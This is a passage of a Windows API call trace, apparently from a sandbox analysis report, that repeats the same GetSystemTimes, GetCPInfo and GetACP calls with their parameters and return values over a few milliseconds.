lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.643] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.643] GetACP () returned 0x4e4 [0111.643] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.644] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.644] GetACP () returned 0x4e4 [0111.644] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.644] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.644] GetACP () returned 0x4e4 [0111.644] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.644] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.644] GetACP () returned 0x4e4 [0111.644] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.644] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.644] GetACP () returned 0x4e4 [0111.644] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.644] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.644] GetACP () returned 0x4e4 [0111.644] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.645] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.645] GetACP () returned 0x4e4 [0111.645] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.645] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.645] GetACP () returned 0x4e4 [0111.645] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.645] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.645] GetACP () returned 0x4e4 [0111.645] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.645] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.645] GetACP () returned 0x4e4 [0111.645] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.645] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.645] GetACP () returned 0x4e4 [0111.645] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.645] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.645] GetACP () returned 0x4e4 [0111.645] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.646] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.646] GetACP () returned 0x4e4 [0111.646] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.646] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.646] GetACP () returned 0x4e4 [0111.646] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.646] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.646] GetACP () returned 0x4e4 [0111.646] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.646] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.646] GetACP () returned 0x4e4 [0111.646] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.646] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.646] GetACP () returned 0x4e4 [0111.646] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.646] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.646] GetACP () returned 0x4e4 [0111.646] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.647] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.647] GetACP () returned 0x4e4 [0111.647] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.647] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.647] GetACP () returned 0x4e4 [0111.647] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.647] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.647] GetACP () returned 0x4e4 [0111.647] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.647] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.647] GetACP () returned 0x4e4 [0111.647] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.647] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.647] GetACP () returned 0x4e4 [0111.647] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.648] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.648] GetACP () returned 0x4e4 [0111.648] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.648] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.648] GetACP () returned 0x4e4 [0111.648] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.648] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.648] GetACP () returned 0x4e4 [0111.648] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.648] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.648] GetACP () returned 0x4e4 [0111.648] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.648] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.648] GetACP () returned 0x4e4 [0111.648] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.649] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.649] GetACP () returned 0x4e4 [0111.649] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.649] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.649] GetACP () returned 0x4e4 [0111.649] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.649] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.649] GetACP () returned 0x4e4 [0111.649] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.649] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.649] GetACP () returned 0x4e4 [0111.649] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.649] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.649] GetACP () returned 0x4e4 [0111.650] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.650] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.650] GetACP () returned 0x4e4 [0111.650] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.650] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.650] GetACP () returned 0x4e4 [0111.650] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.650] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.650] GetACP () returned 0x4e4 [0111.650] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.650] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.650] GetACP () returned 0x4e4 [0111.650] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.650] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.651] GetACP () returned 0x4e4 [0111.651] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.651] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.651] GetACP () returned 0x4e4 [0111.651] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.651] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.651] GetACP () returned 0x4e4 [0111.651] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.651] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.651] GetACP () returned 0x4e4 [0111.651] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.651] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.651] GetACP () returned 0x4e4 [0111.651] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.651] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.651] GetACP () returned 0x4e4 [0111.652] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.652] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.652] GetACP () returned 0x4e4 [0111.652] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.652] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.652] GetACP () returned 0x4e4 [0111.652] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.652] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.652] GetACP () returned 0x4e4 [0111.652] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.652] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.652] GetACP () returned 0x4e4 [0111.652] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.652] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.652] GetACP () returned 0x4e4 [0111.652] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.652] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.652] GetACP () returned 0x4e4 [0111.653] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.653] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.653] GetACP () returned 0x4e4 [0111.653] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.653] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.653] GetACP () returned 0x4e4 [0111.653] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.653] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.653] GetACP () returned 0x4e4 [0111.653] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.653] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.653] GetACP () returned 0x4e4 [0111.653] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.653] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.653] GetACP () returned 0x4e4 [0111.653] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.653] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.654] GetACP () returned 0x4e4 [0111.654] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.654] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.654] GetACP () returned 0x4e4 [0111.654] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.654] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.654] GetACP () returned 0x4e4 [0111.654] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.654] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.654] GetACP () returned 0x4e4 [0111.654] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.654] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.654] GetACP () returned 0x4e4 [0111.654] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.655] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.655] GetACP () returned 0x4e4 [0111.655] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.655] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.655] GetACP () returned 0x4e4 [0111.655] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.655] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.655] GetACP () returned 0x4e4 [0111.655] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.655] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.655] GetACP () returned 0x4e4 [0111.655] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.655] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.655] GetACP () returned 0x4e4 [0111.655] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.655] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.655] GetACP () returned 0x4e4 [0111.655] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.656] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.656] GetACP () returned 0x4e4 [0111.656] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.656] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.656] GetACP () returned 0x4e4 [0111.656] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.656] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.656] GetACP () returned 0x4e4 [0111.656] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.656] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.656] GetACP () returned 0x4e4 [0111.656] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.656] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.656] GetACP () returned 0x4e4 [0111.656] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.656] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.656] GetACP () returned 0x4e4 [0111.657] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.657] GetACP () returned 0x4e4 [0111.657] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.657] GetACP () returned 0x4e4 [0111.657] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.657] GetACP () returned 0x4e4 [0111.657] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.657] GetACP () returned 0x4e4 [0111.657] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, 